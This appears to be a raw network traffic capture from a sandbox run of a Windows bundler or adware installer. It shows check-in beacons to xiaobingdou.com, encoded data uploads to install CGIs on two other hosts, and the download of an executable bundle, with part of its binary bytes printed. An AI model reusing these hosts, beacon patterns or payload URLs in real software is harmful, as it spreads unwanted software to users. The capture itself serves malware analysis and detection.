=604800..Expires: Thu, 05 May 2016 20:26:06 GMT..Age: 365394..Content-
Length: 246..Content-Type: text/plain..Last-Modified: Thu, 21 Jan 2016
 03:27:18 GMT..Connection: keep-alive..............HCT................
......................................................................
......................................................................
......................................................................
.......



POST /jihuo.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGQzc4RjI1RDExOEU4MTVCNERBQzVDRjM5MEMzMjlCMDM3RTBERTg3QjA3NTQ2ODMyRTQ1NjUyQjkxQzNFQkUyNDJEQTgyMjJCMDJFNzk5Q0Y5MkI2MTE0MTMwNjhBRDBDQkE5RDRGQ0ExMUNFOTc5RUNGRkYwRkE1NUU3QzU2N0ZCOTc0QzA5MjgwNzkzQ0FBMDBFNjk2OUI3NTdBMUFF HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2016 01:55:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Length: 0



POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2016 01:55:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <
<<< skipped >>>


POST /jihuo.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUVBQkJBMzMzMzEwNjZEMjZGQzNDMkMwREI0MTIwQ0ZGNDlERjNDNUIyNjgwNjZGRDczQzBCMjQzQjg2RTMzNUIxMkYwQzU4NzY3NzQxQTNDNjc3MEM4M0JFRjlEMkZCNUEyRDA1RTU0OThBQ0Q2QTg2NjlDRTkyMDEyMjkwNzg5 HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2016 01:55:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Length: 0



POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2016 01:55:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <
<<< skipped >>>


POST /fail.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUIyMDBFNEQ5MkU5RjlEN0UzQjI1NTYxMzcwMzQxOTczMTdCQzQ1MjI5QjNCODhBNTgzRjExRTk3NzFBOTRCMUE= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2016 01:55:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Length: 0



POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2016 01:55:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <
<<< skipped >>>


POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2016 01:55:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <
<<< skipped >>>


POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2016 01:55:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <
<<< skipped >>>


POST /cgi-bin-py/weather_install.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=6F9B7B0CEF0C4cfbA767D8D91B5F4982
User-Agent: HTTP_CLIENT
Host: VVV.thedesktopweather.com
Content-Length: 430
Connection: Keep-Alive

--6F9B7B0CEF0C4cfbA767D8D91B5F4982
Content-Disposition: form-data; name="ufile01"; filename="boundary"
Content-Type: application/octet-stream

/x..g^[email protected]..>./..)<.Bq..mb.YoJ~..#=.DuT.v*..n^tP.~y.T,...5..y^bP.rd..aC.ex.Hy.=P.9r..aZ. 4.P(% ..wk.E
.&&.(N....f..oT.1(.P(M`B. $..aZ.8;.H0^.B.((.a..5...(F5P.zx.N78.9?.P(. ..k$.X&T.v(..x.lH. (..7..1x.Hg. ..h~.R7).1=..(.3=1E38566

--6F9B7B0CEF0C4cfbA767D8D91B5F4982--

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Tue, 03 May 2016 01:56:00 GMT
Server: Apache
Content-Length: 7
Connection: keep-alive
success....


POST /cgi-bin-py/weather_install.cgi HTTP/1.1


Content-Type: multipart/form-data; boundary=C5252C36FEFA4de894DB8DCC11B86612
User-Agent: HTTP_CLIENT
Host: VVV.thedesktopweather.com
Content-Length: 425
Connection: Keep-Alive

--C5252C36FEFA4de894DB8DCC11B86612
Content-Disposition: form-data; name="ufile01"; filename="boundary"
Content-Type: application/octet-stream

/x..g^[email protected]..>./..)<.Bq..mb.YoJ~..#=.DuT.v*..n^tP.~y.T,...5..y^bP.rd..aC.ex.Hy.=P.9r..aZ. 4.P(% ..wk.E
.&&.(N....f..oT.1(.P(M`B. $..aZ.8;.H0^.B.((.a..5...(F5P.zx.N78.9?.P(. ..k$.X&T.v(..x.lH. (..7..1x.Hg. ..h~.R7D.)'=1E38566

--C5252C36FEFA4de894DB8DCC11B86612--

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Tue, 03 May 2016 01:56:00 GMT
Server: Apache
Content-Length: 7
Connection: keep-alive
successHTTP/1.1 200 OK..Content-Type: text/plain..Date: Tue, 03 May 20
16 01:56:00 GMT..Server: Apache..Content-Length: 7..Connection: keep-a
live..success....


POST /cgi-bin-py/weather_install.cgi HTTP/1.1


Content-Type: multipart/form-data; boundary=2F3412807F844ce0BD3A3602E56090DD
User-Agent: HTTP_CLIENT
Host: VVV.thedesktopweather.com
Content-Length: 474
Connection: Keep-Alive

--2F3412807F844ce0BD3A3602E56090DD
Content-Disposition: form-data; name="ufile01"; filename="boundary"
Content-Type: application/octet-stream

/x..g^[email protected]..>./..)<.Bq..mb.YoJ~..#=.DuT.v*..n^tP.~y.T,...5..y^bP.rd..aC.ex.Hy.=P.9r..aZ. 4.P(% ..wk.E
.&&.(N....f..oT.1(.P(M`B. $..aZ.8;.H0^.B.((.a..5...(F5P.t}.L,...)..e.*..!(..oT.;-..e.*-.rg.SaL.dx.Hz.<..oD.M&T.v)...`..~(..1..&#.P(Ll^.os.EaL.05..f./..}c.I0..v'.=1E38566

--2F3412807F844ce0BD3A3602E56090DD--

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Tue, 03 May 2016 01:56:03 GMT
Server: Apache
Content-Length: 7
Connection: keep-alive
successHTTP/1.1 200 OK..Content-Type: text/plain..Date: Tue, 03 May 20
16 01:56:03 GMT..Server: Apache..Content-Length: 7..Connection: keep-a
live..success..



POST /begin.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUIyMDBFNEQ5MkU5RjlEN0UzQjI1NTYxMzcwMzQxOTczRjUxNUI4REIxM0Q4OUQ2MEIzMUM2RTQ4NDU4MkI2MjREOTVFRjI5QTQ0NTg0OUYwNjgyRkVFQjdFMkU4OTNFMg== HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2016 01:55:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Length: 0



GET /Setup/51486_a.xml HTTP/1.0
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: wsxc123.cc
Accept: */*
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 19 Apr 2016 09:49:48 GMT
Accept-Ranges: bytes
ETag: "0466bcf209ad11:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2016 01:55:49 GMT
Connection: keep-alive
Content-Length: 35506
#ws...................................................................
......)pu)Kv$qc(wz*Bd$A\ f[)Co)wz$sS*[z%[x#p@)AY(qA*cg k^.............
..........)us)]F)wz$sS f[)Co%wT$bh aE)rI VH*[z%[x#p@)AY(qA*cg k^......
.....*E_)pL$bm$xu q])QL..............#pV(tG$qq%_r*Bi............#pV)jN
*RP%PL$jM(tG$qq VH*ZK(wz*Tc%LV$sK Nu)Kw............(ta VH(tL(tf%_r*Bi(
tG$qq#p@*ah)hH*{w)Fl.... VH.....)\A........$sW dG)\A.......#pV$qc(wz)b
E$oI)\A#pD dG)vC)^@)FS$Oq(ta*Tr hv VH)\A#pE................)bE$oI*dm)p
C....#pV....)@I.........$Kf)bV(uE)bE$oI%LV$sK Nu)Kw...)IO xl#p@(pV)DW)
wv*Z| VH$sW dG$sW$m@)bE$oI#p@)bE$oI*[z(tA*lu*Ab*Z|)DW)wv VH$sW dG)Ci*S
H#p@$L@*Tc%LV$sK f[)Co)\A*Er)D| Wb*lK f[)Co....#pV$Kf)bV(uE)bE$oI%LV$s
K Nu)Kw...)IO xl#p@(tB.(tA)\@ VH*Tc(tA(pV)DW)wv*Z| VH$sW dG)bE$oI#p@%L
V$sK........)DW)wv VH$sW dG)Ci*SH*Er)D| Wb*lK f[)Co......$Kf)bV(uE)bE$
oI#p@%LV$sK Nu)Kw Y@%Qn*@E%^b$sW$m@(tG(tL*ai#p@%LV$sK f[)Co*lK%nT*Si*E
r Wb*lK f[)Co....#pV....)bE$oI)@I#p@%QU%wT)bE$oI......................
........)jN*RP*tl%M_..)Pd)D[$md(ta#p@)DU%wT$bh(tA*Gq)@I........)Dh*Za 
.w wS%K@*Tc)\j)aT)Pd Wb*lK$qc(wz......)Dh*Za*Zu)pC...$qc(wz)At$qq)D[$m
d...*@K)bV*.d)J@$md..#pV(tw%my.....)I.%Xb)a[ `j(t~....................
......................................................................
......................................................................
..............................*CC$s|*QL*c^$qc(wz$sW dG)D[$md..........
........................ Ur)vj*QL*c^)Wq%UI ED.........................
..................................................................
<<< skipped >>>

GET /offer/YeaPlayer_br_IBD_Bundle.exe HTTP/1.0


User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: down.hejie123.com
Accept: */*
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 19 Apr 2016 08:58:04 GMT
Accept-Ranges: bytes
ETag: "0764a95199ad11:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2016 01:55:52 GMT
Connection: keep-alive
Content-Length: 600312
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........D.*.%.y.%.y
.%.y.].y.%.y.].y.%.y.].y9%.y...y.%.y.%.y.%.y.].y.%.y.w.y.%.y.].y.%.yRi
ch.%.y................PE..L...Z.gV.................X..........i.......
.p....@..........................`............@.......................
...................P..............0...............ps..................
............8...@............p...............................text....V
.......X.................. ..`.rdata..V....p.......\..............@..@
.data...|[email protected]................
......@[email protected]@[email protected]....................
......................................................................
......................................................................
......................................................................
......................................................................
............................................3........t.5 .....t...5 ..
.......t...5 .........t...5 .........t...5 .........t...5 .........t..
.5 .........t...5 ...........8E.A........u......3.3...v$W..$......<
13..........3...8E.A;.r._.......SU.l$ .E.V..3.W.F......N..~..X..t$..L$
 ..._D...~..r..?.G.P.'[email protected]$ ............
. ..D$...... ..D$...... .._..D$..;u.v..4....}..r..E....E...02O..T$....
.K.;E.v.......}..r..M....M..D$..T$......2O......;E.v.......}..r..M....
M..D$..T$......2O.....K.;E.v.......}..r..M....M..D$......2O.....K.
<<< skipped >>>


POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2016 01:55:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <
<<< skipped >>>


POST /anzhuang.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDMzMUQzQ0VBQTM1RUNEMDQ2MkQ0Q0Q3MjA5QzgzMTI2NzUwN0E1M0FGRkQ4RjlEMTk1OTVDNDg1MDUwMTkwMEFGNDc2OTBGOUUzMUU3NTREMTE3RkJBM0I4RDA0NkE5QjA= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2016 01:55:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Length: 0



POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2016 01:55:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <
<<< skipped >>>


POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2016 01:55:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <
<<< skipped >>>


POST /reportInstall.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUVBQkJBMzMzMzEwNjZEMjZGQzNDMkMwREI0MTIwQ0ZGNTEyM0U1Q0FDODhFRjdFN0MxNEE5NkY3NzMxQUNEQTY5RTY0MTEwOEI5MDkyQzg5ODE1NDcxQTQwMUFBRkYxRTFBRDFBOTYyMkZBRkVBMzI4MERBQUNDQ0Y2MTk3OUY3NjRFM0FGNzZFMzc4M0Q1MjJBM0YyRDMzNTBEMDY4MjI= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2016 01:55:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Length: 0



POST /cgi-bin-py/calendar_install.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=C528ED7CB09146c38C186BBBE233AE4A
User-Agent: BDI18N
Host: VVV.theadvancedcalendar.com
Content-Length: 468
Connection: Keep-Alive

--C528ED7CB09146c38C186BBBE233AE4A
Content-Disposition: form-data; name="ufile01"; filename="boundary"
Content-Type: application/octet-stream

/x..g^[email protected]..>./..)<.Bq..mb.YoJ~..#=.DuT.v*..n^tP.zf.N'..vv..c.lH..$..oT.-).P(.vD.7(.NaL.
?.:f.7..gh.
4.(...n. P.9|.RaL.ft.D:R.C.#3.a..:x.H;L}A.f&.S7..!).Pq^..._(......j.?a$.<.-N.L
'.%j.S=>;C.P_.Q.=.ix.Hc.=..wf.X*..;>.H0^~P.9e.D...&x.H(Pl..ko..a..86..d.:..w(.]=1E38566

--C528ED7CB09146c38C186BBBE233AE4A--

HTTP/1.1 200 OK
